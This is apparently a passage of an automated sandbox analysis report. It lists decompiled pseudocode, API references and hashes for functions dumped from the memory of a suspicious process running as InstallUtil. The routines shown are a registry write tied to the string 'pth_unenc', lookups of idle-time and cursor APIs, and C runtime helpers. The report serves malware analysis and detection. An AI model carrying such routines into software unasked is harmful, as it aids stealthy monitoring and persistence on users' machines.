bad locale name, xrefs: 0040BA20

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: ed7a60fda07fd8845abb2cab68d107de87f727dfcc98387d51a86573092aaaba
Instruction ID: 27852d0521b04cf9000d748d5a3116f7c8184cd2c3f5c96d485cec925fe4db60
Opcode Fuzzy Hash: ed7a60fda07fd8845abb2cab68d107de87f727dfcc98387d51a86573092aaaba
Instruction Fuzzy Hash: 2EF081319007085AC324FBA5E952E9AB3A8DF15308F60493FF44A620D1AF7DAA1CC6CC

Uniqueness

Uniqueness Score: -1.00%

Function 00410D87 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00410D87(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E0040243C();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00401EC4( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				E00401EC9();
				return _t23;
			}

0x00410d8a
0x00410d8b
0x00410d9a
0x00410dda
0x00410d9c
0x00410da0
0x00410dc1
0x00410dcc
0x00410dd5
0x00410dd5
0x00410ddf
0x00410dea

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,0046E588), ref: 00410D92
RegSetValueExW.ADVAPI32(0046E5A0,00000000,00000000,?,00000000,00000000,0046E5A0,?,?,00000001), ref: 00410DC1
RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00410DCC

Strings

pth_unenc, xrefs: 00410D87

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: b3892c34ef9c9399a6682102e51e4ba41ca650181b65b36b4e59269b14b2b947
Instruction ID: 8ba10e640b7ff33963dbc95539f65f951210b34917a231d0c22b9400e7604ced
Opcode Fuzzy Hash: b3892c34ef9c9399a6682102e51e4ba41ca650181b65b36b4e59269b14b2b947
Instruction Fuzzy Hash: 0DF0C232500208BBCF009FA0ED05EEE376CEF40749F104126FD06AA0A1E735DE44DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004013C6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C6() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46ea48 = _t2;
				return _t2;
			}

0x004013d7
0x004013dd
0x004013e2

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013D0
GetProcAddress.KERNEL32(00000000), ref: 004013D7

Strings

GetCursorInfo, xrefs: 004013C6
User32.dll, xrefs: 004013CB

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 17a436f0c231b68f29c48d6d8c43f46d226062f3925522f598ed4a751ea82805
Instruction ID: d9a19aa7c6af00a7fb6208859f10683f2b4e6040f3627d0b5d69e612b00a10b7
Opcode Fuzzy Hash: 17a436f0c231b68f29c48d6d8c43f46d226062f3925522f598ed4a751ea82805
Instruction Fuzzy Hash: 3CB092B6546300DB87002BF1AC0E9053A74A784B0B7310262FD0986AA2FBB880C0EB1F

Uniqueness

Uniqueness Score: -1.00%

Function 0040146B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040146B() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ea4c = _t2;
				return _t2;
			}

0x0040147c
0x00401482
0x00401487

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401475
GetProcAddress.KERNEL32(00000000), ref: 0040147C

Strings

GetLastInputInfo, xrefs: 0040146B
User32.dll, xrefs: 00401470

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: acb2eb5f90c274c7122aa55885b0c77f73899a9a43e1970f2275810a078b7ed4
Instruction ID: 6c407abe68a16bb2361970f4cab9b832f15876ef16f23ccd3ed4a6c27f1e28b1
Opcode Fuzzy Hash: acb2eb5f90c274c7122aa55885b0c77f73899a9a43e1970f2275810a078b7ed4
Instruction Fuzzy Hash: DEB09B75585300D7C7001FE16C0D51575647644B0F3340165F505865D5E6744084DF1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401488 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401488() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ecb0 = _t2;
				return _t2;
			}

0x00401499
0x0040149f
0x004014a4

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401492
GetProcAddress.KERNEL32(00000000), ref: 00401499

Strings

kernel32.dll, xrefs: 0040148D
GetConsoleWindow, xrefs: 00401488

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: 192b7cc7162fc2b4b9d74742374886a399f33b8230ac7d9b473ac14773d98732
Instruction ID: 35dc7208cfdab57e376f6e01d917a950de79aa42861df2b4344d67bf4347f2ef
Opcode Fuzzy Hash: 192b7cc7162fc2b4b9d74742374886a399f33b8230ac7d9b473ac14773d98732
Instruction Fuzzy Hash: DAB092B964A310DBC7001FB0AD0EA057A64B684B0B324062AF601D71E1FFB89080CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00447724 Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00447724(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E004370F7(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x75f68510
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E004534D0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E004534D0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E004337A0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E004534D0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E004531D0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E004531D0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E004531D0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00447A27(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E004535B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00439941();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043862C();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00447724
0x0044772f
0x00447736
0x00447738
0x00447738
0x0044773a
0x00447743
0x00447745
0x0044774a
0x00447750
0x00447766
0x0044776b
0x0044776e
0x0044777b
0x00447780
0x004477d4
0x004477dc
0x004477de
0x004477e0
0x004477e3
0x004477e3
0x004477e3
0x004477e9
0x004477f1
0x00447804
0x00447807
0x00447809
0x0044780c
0x0044780d
0x0044782e
0x00447831
0x00447831
0x0044780f
0x0044780f
0x00447811
0x0044781c
0x0044781c
0x0044781e
0x00447825
0x00447820
0x00447820
0x00447820
0x0044781e
0x00447832
0x00447834
0x00447835
0x00447838
0x0044783a
0x00447844
0x0044784e
0x0044783c
0x0044783c
0x0044783c
0x00447853
0x00447853
0x00447858
0x0044785b
0x00447866
0x00447866
0x00447866
0x00447866
0x0044786a
0x00447871
0x00447872
0x00447875
0x00447878
0x00447878
0x0044787a
0x00000000
0x00000000
0x00447892
0x00447899
0x0044789d
0x004478a0
0x004478a3
0x004478a5
0x004478a5
0x004478a5
0x004478a7
0x004478aa
0x004478ad
0x004478af
0x004478b7
0x004478bd
0x004478c0
0x004478c3
0x004478c4
0x004478c7
0x004478ca
0x004478ca
0x004478cf
0x004478d2
0x00000000
0x00000000
0x004478ea
0x004478ef
0x004478f3
0x00000000
0x00000000
0x004478f7
0x004478f7
0x004478fa
0x004478fb
0x004478fb
0x004478fd
0x00447900
0x00000000
0x00000000
0x00447902
0x00447905
0x0044790c
0x0044790f
0x00447912
0x00447928
0x00447928
0x00447928
0x00447914
0x00447914
0x00447916
0x00447919
0x00447924
0x0044791b
0x0044791e
0x0044791e
0x00447919
0x00000000
0x00447912
0x00447907
0x00447907
0x00447909
0x00447909
0x0044785d
0x0044785d
0x00447860
0x0044792b
0x0044792b
0x0044792d
0x0044792f
0x00447932
0x00447933
0x00447934
0x00447935
0x0044793d
0x0044793d
0x0044793d
0x0044793f
0x00447942
0x00447945
0x00447947
0x00447947
0x00447949
0x0044795b
0x0044795f
0x00447962
0x00447969
0x00447971
0x00447971
0x00447974
0x00447976
0x00447987
0x00447987
0x0044798b
0x0044798b
0x0044798e
0x00447990
0x00447993
0x00000000
0x00447978
0x00447978
0x0044797e
0x0044797e
0x00447982
0x00447995
0x00447995
0x00447999
0x0044799a
0x0044799c
0x0044799e
0x004479df
0x004479df
0x004479e1
0x004479ee
0x004479ee
0x004479f0
0x004479f2
0x004479f3
0x004479f4
0x004479fb
0x004479fe
0x00447a00
0x00447a00
0x00447a01
0x00447a03
0x00447a06
0x00447a06
0x00447a08
0x00447a0a
0x00000000
0x00447a0a
0x004479e3
0x004479e5
0x00000000
0x00000000
0x004479e7
0x00000000
0x00000000
0x004479e9
0x004479ec
0x00000000
0x00000000
0x00000000
0x004479ec
0x004479a5
0x004479ab
0x004479ab
0x004479ad
0x004479ae
0x004479af
0x004479b0
0x004479b7
0x004479ba
0x004479bc
0x004479bd
0x004479bf
0x004479cc
0x004479cc
0x004479ce
0x004479d0
0x004479d1
0x004479d2
0x004479d9
0x004479dc
0x004479de
0x004479de
0x00000000
0x004479de
0x004479c1
0x004479c1
0x004479c3
0x00000000
0x00000000
0x004479c5
0x00000000
0x00000000
0x004479c7
0x004479ca
0x00000000
0x00000000
0x00000000
0x004479ca
0x004479a7
0x004479a9
0x00000000
0x00000000
0x00000000
0x004479a9
0x0044797a
0x0044797c
0x00000000
0x00000000
0x00000000
0x0044797c
0x00447976
0x00000000
0x00447860
0x0044785b
0x00447782
0x00447784
0x00000000
0x00447786
0x0044779c
0x004477a1
0x004477a3
0x004477af
0x004477b5
0x004477b6
0x004477b8
0x004477ba
0x004477c5
0x004477c5
0x004477c8
0x004477ca
0x004477ca
0x004477cd
0x004477a5
0x004477a5
0x004477a5
0x00000000
0x004477a3
0x00447752
0x00447752
0x00447759
0x0044775a
0x0044775c
0x00447a0e
0x00447a12
0x00447a17
0x00447a17
0x00447a26
0x00447a26

APIs

_strrchr.LIBCMT ref: 004477AF
__alldvrm.LIBCMT ref: 004479B0
__alldvrm.LIBCMT ref: 004479D2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: b6bd738f8c391cb391482916d7ea102935042728f0a59d09ddb8518495e1e0bf
Instruction ID: 713674817242878d3e24880b39ffa9d8aee9d9a2e6613fcea8dfc6a1baf33a57
Opcode Fuzzy Hash: b6bd738f8c391cb391482916d7ea102935042728f0a59d09ddb8518495e1e0bf
Instruction Fuzzy Hash: 5CA157B1A082869FFB129F28C8817AEBBE5EF11310F14456FD9859B382C33C9943C758

Uniqueness

Uniqueness Score: -1.00%

Function 00452984 Relevance: 6.2, APIs: 4, Instructions: 152
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00452984(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E00447364(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E00447364(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E00447364(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00439941()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E00447364(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0044C209(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00439941())) = 0xd;
							_t30 = E0043992E();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E00441BB3(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E004403BF(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E004468E3(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043992E();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00439941())) = 0xd;
										}
										L23:
										_t38 = E00439941();
										E004427C2(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E004403BF(_t56, _t59, _v12);
							E004427C2(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00439941())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00439941()));
			}

0x00452984
0x0045298e
0x00452991
0x00452998
0x0045299f
0x004529a4
0x004529a7
0x004529ad
0x004529c0
0x004529c7
0x004529ca
0x004529cc
0x004529cf
0x00000000
0x00000000
0x004529d5
0x004529d5
0x004529d7
0x004529da
0x004529dc
0x004529df
0x00452abd
0x00452abd
0x00452abf
0x00452a76
0x00452a7e
0x00452a88
0x00452a8b
0x00452b0c
0x00452b0c
0x00452b0e
0x00000000
0x00452b0e
0x00452a8d
0x00452a92
0x00000000
0x00452a92
0x00452ac1
0x00452ac7
0x00452acf
0x00452ad6
0x00452ad9
0x00452adc
0x00000000
0x00000000
0x00452ae6
0x00452aec
0x00452aee
0x00000000
0x00000000
0x00452af5
0x00452afb
0x00452b08
0x00000000
0x00452b08
0x00452ac3
0x00452ac5
0x00000000
0x00000000
0x00000000
0x00452ac5
0x004529e5
0x004529ef
0x004529fb
0x004529fe
0x004529ff
0x00452a01
0x00452a1f
0x00452a22
0x00452a25
0x00452a26
0x00452a26
0x00452a28
0x00452a3b
0x00452a3b
0x00452a3d
0x00452a40
0x00452a45
0x00452a48
0x00452a4b
0x00452a96
0x00452a9b
0x00452a9e
0x00452aa5
0x00452aa5
0x00452aab
0x00452aab
0x00452ab3
0x00452ab9
0x00000000
0x00452ab9
0x00452a4d
0x00452a4e
0x00452a50
0x00452a53
0x00452a55
0x00452a58
0x00452a5a
0x00452a34
0x00452a34
0x00000000
0x00452a34
0x00452a5c
0x00000000
0x00000000
0x00000000
0x00452a5c
0x00452a2a
0x00000000
0x00000000
0x00452a2c
0x00452a32
0x00000000
0x00000000
0x00000000
0x00452a5e
0x00452a5e
0x00452a5e
0x00452a66
0x00452a6c
0x00452a71
0x00452a74
0x00452a74
0x00000000
0x00452a74
0x00452a08
0x00000000
0x00452a08
0x004529e7
0x004529e9
0x00000000
0x00000000
0x00000000
0x004529e9
0x004529af
0x00000000

APIs

_free.LIBCMT ref: 00452AB3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9711a2f99938f2f25c0dfd81e7f0ec9e40ef999c5bffbe70b20706e8bc09e90a
Instruction ID: a58d51ee336de0d36d6904bac323c9a3c4596844ebc27f8faf091d308a43ed6a
Opcode Fuzzy Hash: 9711a2f99938f2f25c0dfd81e7f0ec9e40ef999c5bffbe70b20706e8bc09e90a
Instruction Fuzzy Hash: E3412771A002006BEB31AEBA8D81B6F36A4EF56735F14425BFC1496393D7FC8C45926A

Uniqueness

Uniqueness Score: -1.00%

Function 0043E8C1 Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043E8C1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043EA0E(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E004532B0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x45a280;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x45a24c;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E004532B0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E004532B0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
